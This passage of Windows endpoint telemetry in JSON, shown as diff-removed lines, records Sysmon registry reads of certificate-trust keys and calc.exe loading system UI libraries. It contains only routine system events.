"{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573246980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573246980000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ExtendViewIntoTitleBar", - "registry_value": "ExtendViewIntoTitleBar", - "timestamp": 131883573246980000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "image_load", - "image_name": "CoreUIComponents.dll", - "image_path": "C:\\Windows\\System32\\CoreUIComponents.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "BCP47mrm.dll", - "image_path": "C:\\Windows\\System32\\BCP47mrm.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573246200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "Windows.UI.dll", - "image_path": "C:\\Windows\\System32\\Windows.UI.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573246360000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "TextInputFramework.dll", - "image_path": "C:\\Windows\\System32\\TextInputFramework.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573246360000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247450016, - "unique_pid": 